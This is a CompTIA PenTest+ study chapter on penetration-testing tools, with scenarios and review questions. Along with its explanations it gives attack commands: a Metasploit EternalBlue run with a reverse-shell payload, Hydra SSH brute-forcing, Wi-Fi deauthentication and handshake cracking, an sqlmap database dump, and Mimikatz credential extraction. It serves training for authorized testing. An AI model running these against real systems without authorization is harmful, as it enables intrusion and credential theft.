This chapter covers the essential tools used in penetration testing, as outlined in CompTIA PenTest+ objective 5.1 (Tools Scripts). You will learn about the categories of tools, their functions, common command-line options, and how to select the appropriate tool for each phase of a penetration test. Approximately 20% of the exam questions relate to tool usage, so mastering this content is critical for success. We will cover scanners, exploitation frameworks, password crackers, wireless tools, web application tools, and more.
Jump to a section
Imagine a master carpenter building a custom house. She doesn't just carry a hammer; her toolbox contains dozens of specialized tools, each for a specific task. The tape measure is for reconnaissance—measuring the site and understanding the layout. The circular saw is a scanning tool, quickly cutting through material to reveal structure. For fine work, she uses a chisel and mallet—exploitation tools that precisely remove wood to create joints. The level ensures everything is aligned, like a vulnerability scanner verifying findings. She also carries a stud finder (for enumeration), a pry bar (for privilege escalation), and a set of lock picks (for gaining access). Each tool has a specific purpose, and using the wrong tool—like trying to cut a dovetail joint with a hammer—would ruin the work. Similarly, a penetration tester must select the right tool for each phase: reconnaissance, scanning, exploitation, post-exploitation, and reporting. The carpenter maintains her tools, sharpening blades and calibrating levels, just as a tester updates tool databases and configures scan parameters. The quality of the final build depends on using the right tool correctly. In penetration testing, using the right tool at the right time is the difference between a successful engagement and a failed one.
Overview of Penetration Testing Tools
Penetration testing tools are software applications used to automate and streamline the various phases of a penetration test: reconnaissance, scanning and enumeration, exploitation, post-exploitation, and reporting. The PT0-002 exam expects you to know not only the names of common tools but also their typical use cases, syntax, and output interpretation.
Tools can be categorized by function: - Reconnaissance Tools: Gather information about the target (e.g., WHOIS, nslookup, theHarvester, Recon-ng). - Scanning Tools: Identify live hosts, open ports, and services (e.g., Nmap, Masscan, Unicornscan). - Enumeration Tools: Extract detailed information from services (e.g., enum4linux, smbclient, SNMPwalk). - Vulnerability Scanners: Automatically detect known vulnerabilities (e.g., Nessus, OpenVAS, Qualys). - Exploitation Frameworks: Provide exploits and payloads (e.g., Metasploit, Core Impact, Canvas). - Password Tools: Crack or test passwords (e.g., John the Ripper, Hashcat, Hydra). - Wireless Tools: Assess Wi-Fi security (e.g., Aircrack-ng, Kismet, Reaver). - Web Application Tools: Test web apps (e.g., Burp Suite, OWASP ZAP, Nikto, SQLmap). - Post-Exploitation Tools: Maintain access and pivot (e.g., Mimikatz, PowerSploit, Empire). - Reporting Tools: Generate documentation (e.g., Dradis, Faraday, KeepNote).
Reconnaissance Tools
Reconnaissance is the first phase. Tools like theHarvester collect emails, subdomains, and IPs using search engines. Example:
theHarvester -d example.com -b googleRecon-ng is a full-featured reconnaissance framework with modules for DNS, whois, and social media. WHOIS queries domain registration details. nslookup and dig perform DNS queries. The exam may ask which tool is best for passive reconnaissance (theHarvester) vs. active (nslookup).
Scanning and Enumeration Tools
Nmap is the flagship port scanner. Common options:
- -sS (SYN scan), -sT (TCP connect), -sU (UDP scan)
- -O (OS detection), -sV (version detection)
- -A (aggressive scan combining OS, version, script scanning)
- -p- (all ports)
- --script (run NSE scripts)
Example:
nmap -sS -sV -O -p 1-65535 192.168.1.1Masscan scans large ranges quickly, claiming to transmit packets at 10 million per second. Unicornscan is another high-performance scanner.
Enumeration tools extract details from services. enum4linux enumerates Windows/Samba shares, users, and policies. smbclient connects to SMB shares. SNMPwalk retrieves SNMP MIB data. dnsrecon performs DNS enumeration.
Nessus is a commercial vulnerability scanner. It uses plugins to check for thousands of vulnerabilities. It requires a license but has a free home edition. OpenVAS (now Greenbone) is open-source. Both perform authenticated and unauthenticated scans. The exam may ask about the difference: Nessus is more polished, OpenVAS is free. Qualys is a cloud-based scanner. All produce a list of vulnerabilities with severity ratings (CVSS).
Exploitation Frameworks
Metasploit Framework is the most common. It has modules for exploit, payload, encoder, and auxiliary. Key commands:
- msfconsole starts the interface.
- search finds modules.
- use selects a module.
- set sets options (e.g., RHOSTS, LHOST).
- exploit or run executes.
- sessions lists active sessions.
Example:
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.1.10
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.100
msf6 > exploitCore Impact and Canvas are commercial alternatives. The exam may test that Metasploit is open-source (Rapid7) and that it uses Ruby.
Password Tools
John the Ripper cracks password hashes using CPU. Hashcat uses GPU for faster cracking. Both support many hash types (MD5, SHA1, NTLM, etc.). Hydra performs online brute-force attacks against services like SSH, FTP, HTTP. Example:
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1CeWL generates custom wordlists from a website. The exam may ask which tool is best for offline cracking (John/Hashcat) vs. online (Hydra).
Wireless Tools
Aircrack-ng suite includes:
- airmon-ng enables monitor mode.
- airodump-ng captures packets.
- aireplay-ng injects packets.
- aircrack-ng cracks WEP/WPA keys.
Example:
airmon-ng start wlan0
airodump-ng wlan0monKismet is a passive wireless sniffer and IDS. Reaver performs WPS brute-force attacks. WiFi Pineapple is a rogue access point tool (hardware). The exam may test that WPA2 cracking requires capturing the 4-way handshake.
Web Application Tools
Burp Suite is an intercepting proxy. Features:
Proxy: intercepts requests.
Spider: crawls web apps.
Scanner: finds vulnerabilities (professional only).
Intruder: automates attacks (e.g., fuzzing).
Repeater: manually resends requests.
OWASP ZAP is a free alternative with similar functionality. Nikto is a web server scanner that checks for outdated software and dangerous files. SQLmap automates SQL injection detection and exploitation. Example:
sqlmap -u "http://example.com?id=1" --batch --dbsDirb and Gobuster are directory busters. WPScan targets WordPress.
Post-Exploitation Tools
Mimikatz extracts plaintext passwords, hashes, and Kerberos tickets from memory. PowerSploit is a collection of PowerShell scripts for privilege escalation, persistence, and exfiltration. Empire is a post-exploitation framework using PowerShell agents. Cobalt Strike is a commercial tool for adversary simulation (not on exam but related). The exam may ask which tool extracts credentials from LSASS (Mimikatz).
Reporting Tools
Dradis is a collaboration and reporting platform. Faraday integrates with many tools and centralizes findings. KeepNote is a simple note-taking app. The exam may ask about the importance of documenting evidence and screenshots.
Command-Line vs. GUI
The exam emphasizes command-line tools because they are scriptable and efficient. For example, nmap, hydra, sqlmap are CLI. GUI tools like Burp Suite (has CLI options) and Nessus are also used but CLI is preferred for automation.
Tool Selection Criteria
Phase of test: Recon → scanning → exploitation → post-exploitation.
Target type: Web app → Burp; Network → Nmap; Wireless → Aircrack.
Environment: Windows vs. Linux; internal vs. external.
Legal/Authorization: Some tools (e.g., Metasploit) can cause damage; ensure proper scope.
Exam Tips
Know the primary function of each tool.
Remember common switches (e.g., -sS for SYN scan).
Understand when to use online vs. offline cracking.
Be aware of tool limitations (e.g., Masscan is fast but less accurate).
Practice with virtual labs (e.g., TryHackMe, Hack The Box).
This section provides a foundation; the following step-by-step and real-world sections will deepen your understanding.
Reconnaissance with theHarvester
The first step in any penetration test is passive reconnaissance. Using theHarvester, you gather emails, subdomains, and IP addresses without directly touching the target. The command `theHarvester -d example.com -b google` queries Google's search engine for pages containing `@example.com`. The tool parses results to extract email addresses and hostnames. This information is then used for social engineering or as input for further enumeration. At the protocol level, theHarvester makes HTTPS requests to Google's servers, so no packets are sent to the target itself. This is passive recon—the target has no knowledge of the activity. The output is saved to an HTML or text file for later analysis.
Port Scanning with Nmap
Active reconnaissance begins with Nmap to identify live hosts and open ports. The command `nmap -sS -sV -O -p 1-65535 192.168.1.0/24` performs a SYN scan (`-sS`), version detection (`-sV`), OS detection (`-O`), and scans all 65535 ports. Nmap sends TCP SYN packets to each port. If a SYN-ACK is received, the port is open; if RST, closed; if no response, filtered. Version detection sends additional probes to identified services to determine software versions. OS detection uses TCP/IP stack fingerprinting. The output lists each host with open ports, service versions, and guessed OS. This information guides the exploitation phase.
Enumeration with enum4linux
Once open ports are identified, enumeration extracts details from services. For SMB (port 445), enum4linux is used. Command: `enum4linux -a 192.168.1.10`. The `-a` flag performs all enumeration (users, shares, groups, password policy). The tool sends SMB requests to the target, querying for user lists via SAMR, share lists via SMB, and password policy via LSA. At the protocol level, it uses SMB2 or SMB1 depending on what the server supports. The output reveals usernames (e.g., Administrator), shares (e.g., C$), and policy details (e.g., minimum password length). This data is critical for password guessing and privilege escalation.
Vulnerability Scanning with Nessus
With a list of services, a vulnerability scanner like Nessus identifies known flaws. The tester configures a scan policy (e.g., 'Basic Network Scan') and targets the IP range. Nessus performs a series of probes: it sends packets to each open port and compares responses against a plugin database. For example, plugin 12345 checks for MS17-010 (EternalBlue). If the target responds with a vulnerable SMB version, Nessus flags it as Critical. The scan can be authenticated (using credentials) for deeper checks. The output is a report listing vulnerabilities with CVSS scores, descriptions, and remediation steps. The tester then prioritizes high-severity issues for exploitation.
Exploitation with Metasploit
Using the vulnerability information, the tester launches an exploit via Metasploit. For example, `use exploit/windows/smb/ms17_010_eternalblue` selects the EternalBlue exploit. The tester sets `RHOSTS` to the target IP and `PAYLOAD` to `windows/x64/meterpreter/reverse_tcp`. When `exploit` is run, Metasploit sends a malicious SMB packet to the target that triggers a buffer overflow. The payload executes, opening a reverse connection back to the tester's machine. A Meterpreter session is established, providing interactive access. The session can be used to execute commands, upload/download files, and pivot to other hosts.
Post-Exploitation with Mimikatz
Once a Meterpreter session is obtained, the tester loads Mimikatz to extract credentials. In Meterpreter, run `load mimikatz` then `msv` to dump password hashes from LSASS memory. Mimikatz accesses the Windows Local Security Authority Subsystem Service (LSASS) process, which stores authentication credentials. At the kernel level, it uses techniques like `sekurlsa::logonpasswords` to retrieve plaintext passwords and NTLM hashes from memory. The output includes usernames and their password hashes. These can be used for pass-the-hash attacks or cracked offline. This step demonstrates the full attack chain from recon to credential theft.
Scenario 1: Internal Network Penetration Test for a Financial Institution
A penetration tester is hired to assess a bank's internal network. The tester starts with passive reconnaissance using theHarvester to find employee emails for phishing simulations. Then, Nmap scans the internal IP range 10.0.0.0/8. The scan reveals a legacy Windows Server 2008 R2 with SMB port 445 open. Enumeration with enum4linux shows a guest account with no password. The tester uses Nessus to scan the server, which confirms it is vulnerable to EternalBlue (MS17-010). Exploitation with Metasploit yields a SYSTEM-level shell. Post-exploitation with Mimikatz extracts domain admin credentials from LSASS. The tester uses these to move laterally to the domain controller, demonstrating complete compromise. The report highlights the need to patch SMB, disable guest accounts, and implement least privilege.
Scenario 2: Web Application Assessment for an E-commerce Site
A tester performs a web application test on an e-commerce platform. Using Burp Suite, the tester intercepts traffic and discovers a vulnerable parameter in the login form. SQLmap is used to automate SQL injection, dumping the database containing customer credit card numbers. The tester also uses Nikto to find outdated software versions and Dirb to discover hidden admin panels. The results show that the site is running an old PHP version with known RCE vulnerabilities. The tester exploits this with Metasploit to gain a web shell. Post-exploitation includes using PowerSploit to enumerate the network and exfiltrate data. The report recommends input validation, updating software, and removing unnecessary files.
Scenario 3: Wireless Security Audit for a Corporate Office
A tester evaluates the Wi-Fi security of a company. Using Aircrack-ng, the tester puts the wireless card in monitor mode with airmon-ng start wlan0. Airodump-ng captures packets on the target SSID. The tester captures a WPA2 4-way handshake by deauthenticating a client with aireplay-ng -0 1 -a [BSSID] -c [client MAC] wlan0mon. The handshake is then cracked using Hashcat with a wordlist. The password is found to be 'Password123'. The tester also uses Reaver to attempt WPS pin attacks, which succeeds on a router with WPS enabled. The report advises disabling WPS, using strong passwords, and implementing 802.1X authentication.
Common misconfigurations include default credentials, unpatched systems, and weak encryption. Performance considerations: large-scale scans (e.g., 10,000 hosts) require tools like Masscan; Nessus scans can overwhelm network bandwidth; Metasploit exploits may crash services. Always have a rollback plan and test in a lab first.
The PT0-002 exam tests tools under Objective 5.1: 'Given a scenario, apply the appropriate tool to perform a penetration test.' You must know the primary function of each tool and when to use it. Common wrong answers include:
Confusing scanning and enumeration tools: Candidates often pick Nmap for enumeration (e.g., extracting usernames) when the correct tool is enum4linux. Remember: Nmap scans ports; enum4linux enumerates SMB details.
Selecting the wrong password tool: For offline cracking of NTLM hashes, John the Ripper is correct, but candidates choose Hydra (online brute-force). Tip: offline = John/Hashcat; online = Hydra/Medusa.
Mixing up wireless tools: Airodump-ng captures packets, but candidates think it cracks keys (that's aircrack-ng). Know the suite: airmon-ng (monitor mode), airodump-ng (capture), aireplay-ng (injection), aircrack-ng (cracking).
Web tool confusion: Burp Suite is for intercepting and modifying HTTP traffic; Nikto is a web server scanner; SQLmap automates SQL injection. The exam may ask: 'Which tool would you use to test for SQL injection?' Answer: SQLmap, not Burp (though Burp can be used manually).
Specific numbers/values to remember:
Nmap SYN scan: -sS
Metasploit: use, set, exploit
Hashcat: -m for hash type (e.g., 1000 for NTLM)
John the Ripper: --format to specify hash type
Hydra: -l for username, -P for password list
Edge cases:
If a target has a firewall, Nmap's SYN scan may show ports as filtered; try -sT (TCP connect) instead.
For web apps with CSRF tokens, Burp's Intruder may need macros to handle tokens.
For WPA2 cracking, if no handshake is captured, you cannot crack; the exam may ask: 'What must be captured?' Answer: 4-way handshake.
Elimination strategy: Read the scenario carefully. Identify the phase (recon, scanning, exploitation, etc.) and the specific task (e.g., 'identify open ports' → Nmap; 'extract user list from SMB' → enum4linux). Eliminate tools that do something else. For example, if the task is 'crack password hashes offline', eliminate Hydra (online) and Nmap (scanning).
Nmap SYN scan: nmap -sS target; version detection: -sV; OS detection: -O; aggressive: -A.
Metasploit commands: use [module], set [option] [value], exploit.
John the Ripper cracks hashes offline; Hydra performs online brute-force.
Aircrack-ng suite: airmon-ng (monitor mode), airodump-ng (capture), aireplay-ng (injection), aircrack-ng (cracking).
Burp Suite is an intercepting proxy; OWASP ZAP is a free scanner.
SQLmap automates SQL injection detection and exploitation.
enum4linux enumerates SMB users, shares, and policies.
Mimikatz extracts passwords from LSASS memory.
Hashcat uses GPU for faster cracking; use -m for hash type.
Always match the tool to the phase: recon → theHarvester; scanning → Nmap; exploitation → Metasploit; post-exploitation → Mimikatz.
These come up on the exam all the time. Here's how to tell them apart.
Nmap
Slower but more accurate and feature-rich.
Supports OS detection, version detection, and NSE scripts.
Default scan rate is low; can be increased with -T4 or -T5.
Widely used for detailed service enumeration.
Output includes hostnames, OS, and service versions.
Masscan
Extremely fast, designed for scanning large IP ranges (e.g., entire internet).
Limited to port scanning; no OS/version detection by default.
Can transmit up to 10 million packets per second.
Useful for initial broad scans to find live hosts.
Output is minimal; often used with Nmap for follow-up.
John the Ripper
CPU-based cracking (can use GPU with John's community patches).
Supports many hash formats including dynamic formats.
Slower than Hashcat on GPU.
Built-in wordlist and mangling rules.
Often used in older Linux distributions.
Hashcat
GPU-accelerated cracking; much faster for most hash types.
Supports a wide range of hash types with specific mode numbers (e.g., -m 1000 for NTLM).
Requires compatible GPU and drivers.
Can use mask attacks and rule-based attacks.
Industry standard for high-speed password cracking.
Burp Suite (Free)
Intercepting proxy with manual testing features.
Intruder for automated fuzzing (rate-limited in free).
Repeater for manual request resending.
No automated vulnerability scanner in free edition.
Java-based, can be slower on some systems.
OWASP ZAP
Full-featured free and open-source web app scanner.
Automated spidering and active scanning (AJAX spider included).
Passive scanning for common issues.
Built-in support for WebSocket testing.
Easier to set up and use for beginners.
Mistake
Nmap can enumerate usernames from an SMB server.
Correct
Nmap scans ports and detects services, but it does not enumerate SMB users. Use enum4linux or smbclient for that purpose.
Mistake
Hydra is used for offline password cracking.
Correct
Hydra performs online brute-force attacks against live services. Offline cracking of hashes is done with John the Ripper or Hashcat.
Mistake
Aircrack-ng is used to capture packets.
Correct
Aircrack-ng cracks WEP/WPA keys from captured packets. Packet capture is done by airodump-ng.
Mistake
Burp Suite is a vulnerability scanner that automatically finds all web vulnerabilities.
Correct
Burp Suite's scanner is only in the professional edition; the free edition is an intercepting proxy. OWASP ZAP is a free alternative with scanning.
Mistake
Metasploit is only for exploitation.
Correct
Metasploit includes auxiliary modules for scanning and enumeration, such as port scanners and SMB version detection.
Reveal each answer, then mark whether you got it right. Score 60%+ to unlock the next chapter.
Nmap is the standard tool for port scanning. It offers various scan types (SYN, TCP connect, UDP), OS detection, version detection, and scriptable scanning via NSE. For large ranges, Masscan is faster but less detailed. On the exam, if the scenario requires detailed service identification, choose Nmap.
First, capture the 4-way handshake using airodump-ng. Then use aircrack-ng or Hashcat to crack the handshake file. Example: aircrack-ng -w wordlist.txt capture.cap. Hashcat is faster: hashcat -m 22000 capture.hccapx wordlist.txt.
John the Ripper is CPU-based and supports many hash formats. Hashcat is GPU-accelerated and much faster for most hashes. Hashcat uses mode numbers (e.g., -m 1000 for NTLM). Both are offline crackers. On the exam, if speed is needed, choose Hashcat.
SQLmap is the primary tool for automating SQL injection detection and exploitation. It supports many database types and can dump data. Burp Suite can also manually test SQLi, but SQLmap is automated.
enum4linux enumerates information from Windows and Samba systems via SMB. It extracts user lists, share lists, group memberships, and password policy. It uses RPC calls to query the target.
Start msfconsole, search for an exploit (search eternalblue), use it (use exploit/windows/smb/ms17_010_eternalblue), set required options (set RHOSTS target_ip, set PAYLOAD windows/meterpreter/reverse_tcp, set LHOST your_ip), then run exploit. A session opens if successful.
Burp Suite (free) is an intercepting proxy with manual tools; its automated scanner is only in the professional edition. OWASP ZAP is free and includes an automated scanner, spider, and AJAX spider. ZAP is easier for beginners; Burp is more common in professional environments.
You've just covered Penetration Testing Tools — now see how well it sticks with free PT0-002 practice questions. Full explanations included, no account needed.
Done with this chapter?